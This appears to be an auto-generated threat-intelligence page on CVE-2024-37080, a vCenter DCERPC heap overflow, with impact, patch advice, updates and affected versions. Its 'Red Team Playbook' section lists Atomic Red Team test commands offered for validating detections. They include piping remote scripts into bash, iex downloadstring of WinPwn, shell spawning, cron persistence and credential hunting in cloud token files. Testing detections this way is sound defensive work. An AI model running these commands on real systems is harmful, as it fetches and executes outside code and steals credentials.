CVE-2024-37080
Overview
This vulnerability is a heap-based buffer overflow occurring within the implementation of the DCERPC protocol in VMware vCenter Server. The flaw arises from improper handling of specially crafted network packets that exceed the allocated heap memory buffer. The affected component is the network-facing DCERPC service in vCenter Server version 8.0 and its updates, which processes remote procedure call requests over the network.
Vulnerability Description
vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.
Impact
An unauthenticated attacker with network access to the vCenter Server can exploit this vulnerability to execute arbitrary code remotely, potentially gaining full control over the server. The attack requires no user interaction and no prior authentication, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). Successful exploitation can lead to compromise of the management infrastructure, enabling data breaches, disruption of virtualization services, and lateral movement within the network environment.
Solution
VMware has released patches addressing this vulnerability in vCenter Server version 8.0 and its update releases, as detailed in the Broadcom advisory (https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453). Administrators should apply the latest security updates for vCenter Server 8.0 and 8.0 update1 immediately. The advisory provides specific patch versions and installation instructions to remediate the heap overflow flaw in the DCERPC protocol implementation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The heap-overflow vulnerability present in vCenter Server's implementation of the DCERPC protocol poses a significant risk to organizations utilizing this virtualization management platform. Heap overflows occur when a program writes more data to a heap-allocated memory block than it can hold, leading to adjacent memory corruption. In the context of vCenter Server, this flaw can be exploited by an attacker with network access, who can craft a malicious packet that, when processed by the server, triggers the overflow. This results in the potential for remote code execution, allowing the attacker to execute arbitrary code on the server, which could lead to complete system compromise.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage network access to send specially crafted packets to the vulnerable server. Given that vCenter Server is often exposed to internal networks and, in some cases, the internet, the attack surface is considerable. Attackers could employ techniques such as scanning for vulnerable instances or using social engineering tactics to gain access to the network. Once the malicious packet is sent, the attacker could gain control over the server, potentially leading to further exploitation of the underlying infrastructure, lateral movement within the network, or data exfiltration.
The real-world impact of this vulnerability is profound, particularly for organizations that rely heavily on virtualized environments for their operations. A successful exploitation could result in unauthorized access to sensitive data, disruption of services, and significant financial losses due to downtime and remediation efforts. Furthermore, the breach of critical systems could lead to reputational damage and loss of customer trust, especially in industries where data integrity and availability are paramount. The high CVSS score of 9.8 indicates that this vulnerability is critical, highlighting the urgency for organizations to address it promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating vCenter Server to the latest versions and applying security patches is crucial in protecting against known vulnerabilities. Network segmentation can also be employed to limit exposure, ensuring that only authorized personnel and systems can communicate with the vCenter Server. Additionally, organizations should deploy intrusion detection and prevention systems (IDPS) to monitor network traffic for signs of exploitation attempts. Conducting regular security assessments and penetration testing can help identify potential weaknesses in the environment, allowing for proactive remediation before an attacker can exploit them.
In conclusion, the heap-overflow vulnerability in vCenter Server represents a critical threat to organizations leveraging this technology. The potential for remote code execution through crafted network packets necessitates immediate attention from cybersecurity teams. By understanding the technical details, potential attack vectors, and the real-world implications of this vulnerability, organizations can better prepare themselves to defend against exploitation. Implementing robust detection and mitigation strategies will be essential in safeguarding their virtualized environments and maintaining operational integrity.
CSURFACE threat intelligence has detected a measurable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-37080, reflecting a growing likelihood of exploitation attempts targeting the vCenter Server heap-overflow vulnerability. Although no new exploit techniques or active campaigns have been identified, the upward trend in EPSS—now approaching the 0.3 threshold—indicates heightened attacker interest or preparatory activity within the threat landscape. This rise, coupled with a sustained high severity rating, underscores an elevated risk profile for organizations running affected VMware vCenter Server instances. Defenders should interpret this as a signal that exploitation efforts may become more frequent or sophisticated in the near term, increasing the urgency for vigilant monitoring and proactive defensive postures. While the absence of confirmed exploit deployments tempers immediate alarm, the evolving EPSS trajectory suggests that the vulnerability remains a prime candidate for exploitation, warranting continued attention from security teams.
Update 2 — July 25, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-37080, indicating that attempts to exploit the heap-overflow vulnerability in VMware vCenter Server’s DCERPC implementation are becoming more frequent. Although no new exploit variants or proof-of-concept codes have surfaced, the sharp increase in telemetry signals a growing interest from threat actors who possess network access to vulnerable environments. This development elevates the immediacy of the threat, as it suggests that adversaries are actively probing or testing this attack vector in the wild. The stable EPSS score, while not currently rising, remains near the upper percentile, reinforcing that this vulnerability continues to be a high-priority target. For defenders, this shift underscores an increased likelihood of opportunistic exploitation attempts, heightening the risk of remote code execution incidents if timely detection and response measures are not maintained. Consequently, the threat level for organizations running affected vCenter Server instances should be considered elevated, reflecting a more dynamic and active exploitation landscape.
Update 3 — August 16, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-37080, with our telemetry indicating a significant uptick in attempts to exploit the heap-overflow vulnerability in vCenter Server’s DCERPC protocol. This surge reflects an increased adversary focus on this attack vector, likely driven by its critical severity and potential for remote code execution. Although the EPSS score remains stable near the upper percentile, the pronounced rise in observed exploitation attempts signals a shift toward more frequent opportunistic probing and potential targeted intrusions. For defenders, this evolving pattern heightens the urgency of vigilant monitoring and rapid incident response, as the expanded exploitation footprint increases the probability of successful compromise in environments running vulnerable vCenter Server instances. Consequently, the threat level should be reassessed as elevated, reflecting a more active and dynamic exploitation landscape that demands sustained attention.
Affected Products (86)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update1d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 8.0 |
cpe:2.3:a:vmware:vcenter_server:8.0:update2c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update1:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:update1a:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-37080 |
| support.broadcom.com |
GitHub CVE
|
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453 |